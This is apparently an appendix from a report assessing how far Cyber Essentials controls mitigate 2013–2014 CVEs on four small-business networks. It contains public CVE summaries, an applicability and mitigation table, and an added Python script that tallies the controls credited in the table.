CVE-2014-8638: The navigator.sendBeacon implementation in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 omits the CORS Origin header, which allows remote attackers to bypass intended CORS access-control checks and conduct cross-site request forgery (CSRF) attacks via a crafted web site.
CVE-2014-8835: The xpc_data_get_bytes function in libxpc in Apple OS X before 10.10.2 does not verify that a dictionary's Attributes key has the xpc_data data type, which allows attackers to execute arbitrary code by providing a crafted dictionary to sysmond, related to an "XPC type confusion" issue.
CVE-2014-9159: Heap-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2014-8457 and CVE-2014-8460.
CVE-2014-9163: Stack-based buffer overflow in Adobe Flash Player before 13.0.0.259 and 14.x and 15.x before 15.0.0.246 on Windows and OS X, and before 11.2.202.425 on Linux, allows attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in December 2014.
CVE-2014-9350: TP-Link TL-WR740N 4 with firmware 3.17.0 Build 140520, 3.16.6 Build 130529, and 3.16.4 Build 130205 allows remote attackers to cause a denial of service (httpd crash) via vectors involving a "new" value in the isNew parameter to PingIframeRpm.htm.
CVE-2014-9357: Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build in a Dockerfile in an LZMA (.xz) archive, related to the chroot for archive extraction.
Survey Responses
Cyber Controls Applicability (CVE-2014 rows of the table, pages 17-18 of the report)

Columns: the CVE; a y/n flag for each of the four SME networks (SME1 to SME4) and for the Idealised network built from the survey responses; the mitigation outcome with no Cyber Essentials controls in place (No CE); and the outcome with the controls in place (With CE), followed by the controls credited. A "-" marks a cell that is missing in the source.

CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE
CVE-2014-1472 | y | n | n | n | n | Not Mitigated | Mitigated - Website Blacklisting, Patch Management
CVE-2014-1477 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1518 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1563 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1565 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1586 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1701 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-1740 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1744 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1753 | y | n | y | y | y | Not Mitigated | Mitigated - Website Blacklisting & Patch Management
CVE-2014-1806 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1808 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Website Blacklisting & Patch Management
CVE-2014-1811 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall
CVE-2014-1812 | y | y | y | y | y | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-2014 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-2103 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti-DoS
CVE-2014-2109 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-2364 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-2416 | n | y | y | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-2554 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management, Access Control, Website Blacklisting
CVE-2014-2643 | n | y | n | n | n | Not Mitigated | Mitigated - Patch Management, Strong Passwords (User Access)
CVE-2014-2742 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti-DoS
CVE-2014-2768 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2789 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2791 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2794 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2808 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2821 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-3444 | n | n | n | y | n | Not Mitigated | Mitigated - Anti-Malware, Patch Management
CVE-2014-3489 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-3507 | n | n | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-3556 | y | n | y | n | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-3580 | y | y | y | n | n | Not Mitigated | Mitigated - Firewall, Anti-DoS, Patch Management
CVE-2014-3814 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-3819 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti-DoS, Firmware Updates
CVE-2014-3872 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration & Patch Management
CVE-2014-4044 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-4079 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4082 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4100 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4105 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4114 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware
CVE-2014-4127 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4130 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4132 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4133 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4141 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4481 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware
CVE-2014-4617 | y | y | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-4631 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2014-6040 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-6105 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-6136 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-6363 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6369 | y | n | y | y | - | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6378 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-6487 | n | n | y | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-7250 | n | y | y | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-7927 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration (Access Control), Patch Management
CVE-2014-7945 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-8447 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management
CVE-2014-8638 | y | y | y | y | y | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-8835 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-9159 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay]
CVE-2014-9163 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay]
CVE-2014-9350 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall, Anti-DoS, Firmware Updates
CVE-2014-9357 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware, Secure Configuration
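The following Python is an added example and not code from the report or its authors: it parses rows of the Cyber Controls Applicability table once they have been transcribed into a pipe-separated form with the table's eight columns (an assumed format, not one the report defines), then tallies how often each Cyber Essentials control is credited and how the With CE outcomes split between full and partial mitigation. The twelve embedded rows are a constructed sample transcribed from the table; paste in all rows to get figures for the whole appendix.

```python
"""Added example (not part of the original report): parse rows of the
Cyber Controls Applicability table and tally which Cyber Essentials
controls are credited with each mitigation outcome.  The row format is
an assumption: one row per line, eight pipe-separated cells in the
table's column order."""
import re
from collections import Counter

NETWORKS = ("SME1", "SME2", "SME3", "SME4", "Idealised")

# Constructed sample: twelve rows transcribed from the table, in the
# order CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE.
SAMPLE_ROWS = """\
CVE-2014-1472 | y | n | n | n | n | Not Mitigated | Mitigated - Website Blacklisting, Patch Management
CVE-2014-1477 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1701 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-1811 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall
CVE-2014-1812 | y | y | y | y | y | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-2103 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti-DoS
CVE-2014-2768 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-3444 | n | n | n | y | n | Not Mitigated | Mitigated - Anti-Malware, Patch Management
CVE-2014-4114 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware
CVE-2014-8835 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-9159 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay]
CVE-2014-9357 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware, Secure Configuration
"""


def parse_with_ce(cell):
    """Split a 'With CE' cell such as
    'Partially Mitigated - Anti-Malware, Patch Management [Time Delay]'
    into (outcome, [base control names], time_delay_flag).  Bracketed
    and parenthesised qualifiers are dropped so that, for example,
    'Secure Configuration (Secure Browser)' and 'Secure Configuration'
    count as the same control."""
    outcome, _, rest = cell.partition(" - ")
    time_delay = "[Time Delay]" in rest
    rest = re.sub(r"\s*\[[^\]]*\]", "", rest)
    rest = re.sub(r"\s*\([^)]*\)", "", rest)
    controls = [c.strip() for c in re.split(r"[,&]", rest) if c.strip()]
    return outcome.strip(), controls, time_delay


def parse_rows(text):
    """Turn the pipe-separated rows into dicts; a malformed row raises
    rather than silently skewing the counts."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        cells = [c.strip() for c in line.split("|")]
        if len(cells) != 8:
            raise ValueError(f"expected 8 cells, got {len(cells)}: {line!r}")
        outcome, controls, time_delay = parse_with_ce(cells[7])
        rows.append({
            "cve": cells[0],
            # only an explicit 'y' sets the flag; 'n' or a missing '-' cell does not
            "applies": {net: flag == "y" for net, flag in zip(NETWORKS, cells[1:6])},
            "no_ce": cells[6],
            "with_ce": outcome,
            "controls": controls,
            "time_delay": time_delay,
        })
    return rows


def outcome_tally(rows):
    """Number of rows per 'With CE' outcome (Mitigated / Partially Mitigated)."""
    return Counter(r["with_ce"] for r in rows)


def control_tally(rows):
    """Number of CVEs each control is credited against, fully or partially."""
    return Counter(c for r in rows for c in r["controls"])


def cves_for_network(rows, network):
    """CVE ids flagged 'y' in the given network column."""
    return [r["cve"] for r in rows if r["applies"][network]]


if __name__ == "__main__":
    rows = parse_rows(SAMPLE_ROWS)
    print("outcomes:", dict(outcome_tally(rows)))
    for control, n in control_tally(rows).most_common():
        print(f"{control:<22} {n}")
    print("flagged for SME2:", cves_for_network(rows, "SME2"))
```

Qualifiers in parentheses are folded into the base control deliberately: the table credits "Secure Configuration (Secure Browser)" on the browser rows and plain "Secure Configuration" elsewhere, and a practitioner comparing controls wants both under one heading. Keep the `[Time Delay]` flag separate, since those rows are only partially mitigated until a patch exists.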
CVE Details

CVE-2013-0008: win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle window broadcast messages, which allows local users to gain privileges via a crafted application, aka "Win32k Improper Message Handling Vulnerability."

CVE-2013-0022: Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer LsGetTrailInfo Use After Free Vulnerability."

CVE-2013-0084: Directory traversal vulnerability in Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allows remote attackers to bypass intended read restrictions for content, and hijack user accounts, via a crafted URL, aka "SharePoint Directory Traversal Vulnerability."

CVE-2013-0140: SQL injection vulnerability in the Agent-Handler component in McAfee ePolicy Orchestrator (ePO) before 4.5.7 and 4.6.x before 4.6.6 allows remote attackers to execute arbitrary SQL commands via a crafted request over the Agent-Server communication channel.

CVE-2013-0149: The OSPF implementation in Cisco IOS 12.0 through 12.4 and 15.0 through 15.3, IOS-XE 2.x through 3.9.xS, ASA and PIX 7.x through 9.1, FWSM, NX-OS, and StarOS before 14.0.50488 does not properly validate Link State Advertisement (LSA) type 1 packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a (1) unicast or (2) multicast packet, aka Bug IDs CSCug34485, CSCug34469, CSCug39762, CSCug63304, and CSCug39795.

CVE-2013-0172: Samba 4.0.x before 4.0.1, in certain Active Directory domain-controller configurations, does not properly interpret Access Control Entries that are based on an objectClass, which allows remote authenticated users to bypass intended restrictions on modifying LDAP directory objects by leveraging (1) objectClass access by a user, (2) objectClass access by a group, or (3) write access to an attribute.

CVE-2013-0174: The external node classifier (ENC) API in Foreman before 1.1 allows remote attackers to obtain the hashed root password via an API request.

CVE-2013-0199: The default LDAP ACIs in FreeIPA 3.0 before 3.1.2 do not restrict access to the (1) ipaNTTrustAuthIncoming and (2) ipaNTTrustAuthOutgoing attributes, which allow remote attackers to obtain the Cross-Realm Kerberos Trust key via unspecified vectors.

CVE-2013-0253: The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.

CVE-2013-0270: OpenStack Keystone Grizzly before 2013.1, Folsom, and possibly earlier allows remote attackers to cause a denial of service (CPU and memory consumption) via a large HTTP request, as demonstrated by a long tenant_name when requesting a token.

CVE-2013-0481: The console in IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 and 2.2 allows remote attackers to read stack traces by triggering (1) an error or (2) an exception.

CVE-2013-0598: Cross-site request forgery (CSRF) vulnerability in the Web Client in IBM Rational ClearQuest 7.1 before 7.1.2.12, 8.0 before 8.0.0.8, and 8.0.1 before 8.0.1.1 allows remote attackers to hijack the authentication of arbitrary users.

CVE-2013-0619: Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11.x before 11.0.1 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-1530, CVE-2013-0601, CVE-2013-0605, CVE-2013-0616, CVE-2013-0620, and CVE-2013-0623.

CVE-2013-0633: Buffer overflow in Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on Windows and Mac OS X, before 10.3.183.51 and 11.x before 11.2.202.262 on Linux, before 11.1.111.32 on Android 2.x and 3.x, and before 11.1.115.37 on Android 4.x allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013.

CVE-2013-0649: Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0644 and CVE-2013-1374.

CVE-2013-0746: Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 do not properly implement quickstubs that use the jsval data type for their return values, which allows remote attackers to execute arbitrary code or cause a denial of service (compartment mismatch and application crash) via crafted JavaScript code that is not properly handled during garbage collection.

CVE-2013-0753: Use-after-free vulnerability in the serializeToStream implementation in the XMLSerializer component in Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 allows remote attackers to execute arbitrary code via crafted web content.

CVE-2013-0787: Use-after-free vulnerability in the nsEditor::IsPreformatted function in editor/libeditor/base/nsEditor.cpp in Mozilla Firefox before 19.0.2, Firefox ESR 17.x before 17.0.4, Thunderbird before 17.0.4, Thunderbird ESR 17.x before 17.0.4, and SeaMonkey before 2.16.1 allows remote attackers to execute arbitrary code via vectors involving an execCommand call.

CVE-2013-0909: The XSS Auditor in Google Chrome before 25.0.1364.152 allows remote attackers to obtain sensitive HTTP Referer information via unspecified vectors.

CVE-2013-1035: The iTunes ActiveX control in Apple iTunes before 11.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.

CVE-2013-1102: The Wireless Intrusion Prevention System (wIPS) component on Cisco Wireless LAN Controller (WLC) devices with software 7.0 before 7.0.235.0, 7.1, 7.2 before 7.2.110.0, and 7.3 before 7.3.101.0 allows remote attackers to cause a denial of service (device reload) via crafted IP packets, aka Bug ID CSCtx80743.

CVE-2013-1140: The XML parser in Cisco Security Monitoring, Analysis, and Response System (MARS) allows remote attackers to read arbitrary files via an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, aka Bug ID CSCue55093.
CVE-2013-1144: Memory leak in the IKEv1 implementation in Cisco IOS 15.1 allows remote attackers to cause a denial of service (memory consumption) via unspecified (1) IPv4 or (2) IPv6 IKE packets, aka Bug ID CSCth81055.

CVE-2013-1153: Cross-site request forgery (CSRF) vulnerability in the web interface in Cisco Prime Infrastructure allows remote attackers to hijack the authentication of arbitrary users, aka Bug ID CSCue84676.

CVE-2013-1181: Cisco NX-OS on Nexus 5500 devices 4.x and 5.x before 5.0(3)N2(2), Nexus 3000 devices 5.x before 5.0(3)U3(2), and Unified Computing System (UCS) 6200 devices before 2.0(1w) allows remote attackers to cause a denial of service (device reload) by sending a jumbo packet to the management interface, aka Bug IDs CSCtx17544, CSCts10593, and CSCtx95389.

CVE-2013-1303: Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1304 and CVE-2013-1338.

CVE-2013-1384: Adobe Shockwave Player before 12.0.2.122 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-1386.

CVE-2013-1388: Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 10, 9.0.1 before Update 9, 9.0.2 before Update 4, and 10 before Update 9 allows attackers to obtain administrator-console access via unknown vectors.

CVE-2013-1450: Microsoft Internet Explorer 8 and 9, when the Proxy Settings configuration has the same Proxy address and Port values in the HTTP and Secure rows, does not properly reuse TCP sessions to the proxy server, which allows remote attackers to obtain sensitive information intended for a specific host via a crafted HTML document that triggers many HTTPS requests and then triggers an HTTP request to that host, as demonstrated by reading a Cookie header, aka MSRC 12096gd.

CVE-2013-1472: Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.

CVE-2013-1553: Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.6.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Services Security.

CVE-2013-1620: The TLS implementation in Mozilla Network Security Services (NSS) does not properly consider timing side-channel attacks on a noncompliant MAC check operation during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, a related issue to CVE-2013-0169.

CVE-2013-1627: Absolute path traversal vulnerability in NTWebServer.exe in Indusoft Studio 7.0 and earlier and Advantech Studio 7.0 and earlier allows remote attackers to read arbitrary files via a full pathname in an argument to the sub_401A90 CreateFileW function.

CVE-2013-1638: Opera before 12.13 allows remote attackers to execute arbitrary code via crafted clipPaths in an SVG document.

CVE-2013-1669: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 21.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2013-1676: The SelectionIterator::GetNextSegment function in Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, Thunderbird before 17.0.6, and Thunderbird ESR 17.x before 17.0.6 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds read) via unspecified vectors.

CVE-2013-1700: The Mozilla Maintenance Service in Mozilla Firefox before 22.0 on Windows does not properly handle inability to launch the Mozilla Updater executable file, which allows local users to gain privileges via vectors involving placement of a Trojan horse executable file at an arbitrary location.

CVE-2013-1734: Cross-site request forgery (CSRF) vulnerability in attachment.cgi in Bugzilla 2.x, 3.x, and 4.0.x before 4.0.11; 4.1.x and 4.2.x before 4.2.7; and 4.3.x and 4.4.x before 4.4.1 allows remote attackers to hijack the authentication of arbitrary users for requests that commit an attachment change via an update action.

CVE-2013-1777: The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not properly implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.

CVE-2013-2319: FileMaker Pro before 12 and Pro Advanced before 12 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-2340: Unspecified vulnerability on the HP ProCurve JC*A, JC*B, JD*A, JD*B, JE*A, JF*A, JF*B, JF*C, JG*A, 658250-B21, and 658247-B21; HP 3COM routers and switches; and HP H3C routers and switches allows remote attackers to execute arbitrary code or obtain sensitive information via unknown vectors.

CVE-2013-2350: Unspecified vulnerability in HP Storage Data Protector 6.2X allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors, aka ZDI-CAN-1897.

CVE-2013-2492: Stack-based buffer overflow in Firebird 2.1.3 through 2.1.5 before 18514, and 2.5.1 through 2.5.3 before 26623, on Windows allows remote attackers to execute arbitrary code via a crafted packet to TCP port 3050, related to a missing size check during extraction of a group number from CNCT information.

CVE-2013-2507: Multiple cross-site scripting (XSS) vulnerabilities in the Brother MFC-9970CDW printer with firmware G (1.03) allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to admin/log_to_net.html or (2) kind parameter to fax/copy_settings.html, a different vulnerability than CVE-2013-2670 and CVE-2013-2671.

CVE-2013-2736: Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, CVE-2013-2735, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, and CVE-2013-3341.

CVE-2013-2780: Siemens SIMATIC S7-1200 PLCs 2.x and 3.x allow remote attackers to cause a denial of service (defect-mode transition and control outage) via crafted packets to UDP port 161 (aka the SNMP port).

CVE-2013-2803: ProSoft RadioLinx ControlScape before 6.00.040 uses a deficient PRNG algorithm and seeding strategy for passphrases, which makes it easier for remote attackers to obtain access via a brute-force attack.

CVE-2013-2824: Schneider Electric StruxureWare SCADA Expert Vijeo Citect 7.40, Vijeo Citect 7.20 through 7.30SP1, CitectSCADA 7.20 through 7.30SP1, StruxureWare PowerSCADA Expert 7.30 through 7.30SR1, and PowerLogic SCADA 7.20 through 7.20SR1 do not properly handle exceptions, which allows remote attackers to cause a denial of service via a crafted packet.
CVE-2013-2826: WellinTech KingSCADA before 3.1.2, KingAlarm&Event before 3.1, and KingGraphic before 3.1.2 perform authentication on the KAEClientManager console rather than on the server, which allows remote attackers to bypass intended access restrictions and discover credentials via a crafted packet to TCP port 8130.

CVE-2013-2920: The DoResolveRelativeHost function in url/url_canon_relative.cc in Google Chrome before 30.0.1599.66 allows remote attackers to cause a denial of service (out-of-bounds read) via a relative URL containing a hostname, as demonstrated by a protocol-relative URL beginning with a www.google.com substring.

CVE-2013-3064: Open redirect vulnerability in ui/dynamic/unsecured.html in Linksys EA6500 with firmware 1.1.28.147876 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the target parameter.

CVE-2013-3116: Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3137: Microsoft FrontPage 2003 SP3 does not properly parse DTDs, which allows remote attackers to obtain sensitive information via crafted XML data in a FrontPage document, aka "XML Disclosure Vulnerability."

CVE-2013-3194: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3199: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3201: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3203, CVE-2013-3206, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3206: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3201, CVE-2013-3203, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3280: EMC RSA Authentication Agent 7.1.x before 7.1.2 for Web for Internet Information Services has a fail-open design, which allows remote attackers to bypass intended access restrictions via vectors that trigger an agent crash.

CVE-2013-3387: Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance 8.6 and 9.x before 9.2(1) allows remote attackers to cause a denial of service (disk consumption) via a flood of TCP packets to port 5400, leading to large error-log files, aka Bug ID CSCua42724.

CVE-2013-3417: The administrative web interface in Cisco Video Surveillance Operations Manager does not properly perform authentication, which allows remote attackers to watch video feeds via a crafted URL, aka Bug ID CSCtg72262.

CVE-2013-3632: The Cron service in rpc.php in OpenMediaVault allows remote authenticated users to execute cron jobs as arbitrary users and execute arbitrary commands via the username parameter.

CVE-2013-3656: Cybozu Office 9.1.0 and earlier does not properly manage sessions, which allows remote attackers to bypass authentication by leveraging knowledge of a login URL.

CVE-2013-3856: Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."

CVE-2013-3860: Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does not properly parse a DTD during XML digital-signature validation, which allows remote attackers to cause a denial of service (application crash or hang) via a crafted signed XML document, aka "Entity Expansion Vulnerability."

CVE-2013-3893: Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help: URL that triggers loading of hxds.dll.

CVE-2013-3897: Use-after-free vulnerability in the CDisplayPointer class in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted JavaScript code that uses the onpropertychange event handler, as exploited in the wild in September and October 2013, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3900: The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly validate PE file digests during Authenticode signature verification, which allows remote attackers to execute arbitrary code via a crafted PE file, aka "WinVerifyTrust Signature Validation Vulnerability."

